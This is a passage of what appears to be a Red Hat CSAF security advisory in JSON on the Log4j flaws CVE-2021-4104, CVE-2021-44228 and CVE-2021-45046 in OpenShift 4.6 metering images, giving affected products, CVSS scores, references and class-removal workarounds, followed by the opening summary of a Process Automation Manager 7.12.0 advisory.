"purl": "pkg:oci/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-presto\u0026tag=v4.6.0-202112150545.p0.g190688a.assembly.art3595"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64 as a component of Red Hat OpenShift Container Platform 4.6",
"product_id": "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64"
},
"product_reference": "openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64",
"relates_to_product_reference": "8Base-RHOSE-4.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64 as a component of Red Hat OpenShift Container Platform 4.6",
"product_id": "8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64"
},
"product_reference": "openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64",
"relates_to_product_reference": "8Base-RHOSE-4.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64 as a component of Red Hat OpenShift Container Platform 4.6",
"product_id": "8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64"
},
"product_reference": "openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64",
"relates_to_product_reference": "8Base-RHOSE-4.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64 as a component of Red Hat OpenShift Container Platform 4.6",
"product_id": "8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64"
},
"product_reference": "openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64",
"relates_to_product_reference": "8Base-RHOSE-4.6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-4104",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-13T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2031667"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Java logging library Apache Log4j in version 1.x. JMSAppender in Log4j 1.x is vulnerable to deserialization of untrusted data. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender and to the attacker\u0027s JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Based on the conditions to be exploitable (see details below), the risk is much lower than Log4j 2.x and Red Hat has assessed this to be Moderate severity. This flaw has been filed for Log4j 1.x, and the corresponding flaw information for Log4j 2.x is available at: https://access.redhat.com/security/cve/CVE-2021-44228\n\nNote this flaw ONLY affects applications which are specifically configured to use JMSAppender, which is not the default, or when the attacker has write access to the Log4j configuration for adding JMSAppender to the attacker\u0027s JNDI LDAP endpoint. \n\nIf the Log4j configuration is set TopicBindingName or TopicConnectionFactoryBindingName configurations allowing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228 Log4j 2.x, Log4j 1.x is vulnerable. However, the attack vector is reduced as it depends on having write access, which is not a standard configuration rather than untrusted user input. These are sufficient factors beyond the attacker\u0027s control.\n\nThe tomcat package shipped with Red Hat Enterprise Linux does not include log4j but it does include a default configuration for log4j, log4j.properties, which could be used with tomcat if users choose to install and configure the library. The JMSAppender is not enabled by default, and the permissions of the file can only be modified as root.\n\nRed Hat Virtualization ships log4j12-1.2.17, but it is used and configured in a way which makes this flaw not possible to exploit. Therefore impact is rated Low.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64"
],
"known_not_affected": [
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-4104"
},
{
"category": "external",
"summary": "RHBZ#2031667",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2031667"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-4104",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4104"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-4104",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4104"
},
{
"category": "external",
"summary": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126",
"url": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126"
},
{
"category": "external",
"summary": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-991723301",
"url": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-991723301"
},
{
"category": "external",
"summary": "https://lists.apache.org/thread/0x4zvtq92yggdgvwfgsftqrj4xx5w0nx",
"url": "https://lists.apache.org/thread/0x4zvtq92yggdgvwfgsftqrj4xx5w0nx"
},
{
"category": "external",
"summary": "https://www.openwall.com/lists/oss-security/2021/12/13/1",
"url": "https://www.openwall.com/lists/oss-security/2021/12/13/1"
}
],
"release_date": "2021-12-10T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-16T07:50:00+00:00",
"details": "For OpenShift Container Platform 4.6 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.6/updating/updating-cluster-cli.html",
"product_ids": [
"8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5141"
},
{
"category": "workaround",
"details": "These are the possible mitigations for this flaw for releases version 1.x:\n\n- Comment out or remove JMSAppender in the Log4j configuration if it is used\n- Remove the JMSAppender class from the classpath. For example:\n```\nzip -q -d log4j-*.jar org/apache/log4j/net/JMSAppender.class\n```\n- Restrict access for the OS user on the platform running the application to prevent modifying the Log4j configuration by the attacker.",
"product_ids": [
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender"
},
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-10T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030932"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64"
],
"known_not_affected": [
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "RHBZ#2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-10T02:01:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-16T07:50:00+00:00",
"details": "For OpenShift Container Platform 4.6 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.6/updating/updating-cluster-cli.html",
"product_ids": [
"8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5141"
},
{
"category": "workaround",
"details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441",
"product_ids": [
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2021-12-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Critical"
}
],
"title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value"
},
{
"cve": "CVE-2021-45046",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-12-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2032580"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.16.0. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern resulting in remote code execution (RCE) in a limited number of environments.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Although we have matched Apache\u0027s CVSS score, with the exception of the scope metric which will remain unaltered at \"unchanged\"; as we believe code execution would be at the permission levels of the running JVM and not exceeding that of the original CVE-2021-44228 flaw.\n \nWe have given this vulnerability an impact rating of Moderate, this is because of the unlikely nature of log4j lookup mapping values being derived from attacker controlled values. This is not the default configuration for end-applications using log4j 2.x and would require explicit action from a privileged user (a developer or administrator) to access the vulnerability. \nIn certain non-default configurations, it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was insufficient.\n\nThis issue affects the log4j version between 2.0 and 2.15. Log4j 1.x is NOT impacted by this vulnerability. \n\nPrerequisites to exploit this flaw are :\n\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n- Log4j configuration file should be explicitly configured to use a non-default Pattern Layout with a Context Lookup eg. ($${ctx:loginId}) \n\nIn most cases, the mitigation suggested for CVE-2021-44228 (i.e. to set the system property `log4j2.noFormatMsgLookup` to `true) does NOT mitigate this specific vulnerability. \nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFor Elasticsearch, as shipped in OpenShift 3.11, the \"log4j2.formatMsgNoLookups=true\" system property mitigation is sufficient as there are no included non-standard configurations that allow for exploitation:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nhttps://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\n\nFor CodeReady Studio the fix for this flaw is available on CodeReady Studio 12.21.3 and above versions.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64"
],
"known_not_affected": [
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-45046"
},
{
"category": "external",
"summary": "RHBZ#2032580",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-45046",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-45046"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2021-44228",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.openwall.com/lists/oss-security/2021/12/14/4",
"url": "https://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-14T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-16T07:50:00+00:00",
"details": "For OpenShift Container Platform 4.6 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.6/updating/updating-cluster-cli.html",
"product_ids": [
"8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5141"
},
{
"category": "workaround",
"details": "For Log4j versions up to and including 2.15.0, this issue can be mitigated by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).",
"product_ids": [
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2023-05-01T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Moderate"
}
],
"title": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)"
}
]
}
rhsa-2022_0296
Vulnerability from csaf_redhat
Published
2022-01-26 15:52
Modified
2024-12-12 01:18
Summary
Red Hat Security Advisory: Red Hat Process Automation Manager 7.12.0 security update
Notes
Topic
An update is now available for Red Hat Process Automation Manager.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services.
This release of Red Hat Process Automation Manager 7.12.0 serves as an update to Red Hat Process Automation Manager 7.11.1, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.
Security Fix(es):
* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)
* jackson-dataformat-cbor: Unchecked allocation of byte buffer can cause a java.lang.OutOfMemoryError exception (CVE-2020-28491)
* kubernetes-client: fabric8-kubernetes-client: vulnerable to a path traversal leading to integrity and availability compromise (CVE-2021-20218)
* xstream: Arbitrary code execution via unsafe deserialization of com.sun.corba.* (CVE-2021-39149)
* xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.ldap.LdapBindingEnumeration (CVE-2021-39145)
* xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.ldap.LdapBindingEnumeration (CVE-2021-39151)
* xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.ldap.LdapSearchEnumeration (CVE-2021-39147)
* xstream: Arbitrary code execution via unsafe deserialization of com.sun.jndi.toolkit.dir.ContextEnumerator (CVE-2021-39148)
* xstream: Arbitrary code execution via unsafe deserialization of com.sun.xml.internal.ws.client.sei.* (CVE-2021-39141)
* xstream: Arbitrary code execution via unsafe deserialization of javax.swing.UIDefaults$ProxyLazyValue (CVE-2021-39146)
* xstream: Arbitrary code execution via unsafe deserialization of javax.swing.UIDefaults$ProxyLazyValue (CVE-2021-39154)
* xstream: Arbitrary code execution via unsafe deserialization of sun.tracing.* (CVE-2021-39144)
* xstream: Arbitrary code execution via unsafe deserialization of Xalan xsltc.trax.TemplatesImpl (CVE-2021-39139)
* xstream: Arbitrary code execution via unsafe deserialization of Xalan xsltc.trax.TemplatesImpl (CVE-2021-39153)
* xstream: Infinite loop DoS via unsafe deserialization of sun.reflect.annotation.AnnotationInvocationHandler (CVE-2021-39140)
* xstream: remote command execution attack by manipulating the processed input stream (CVE-2021-29505)
* xstream: Server-side request forgery (SSRF) via unsafe deserialization of com.sun.xml.internal.ws.client.sei.* (CVE-2021-39150)
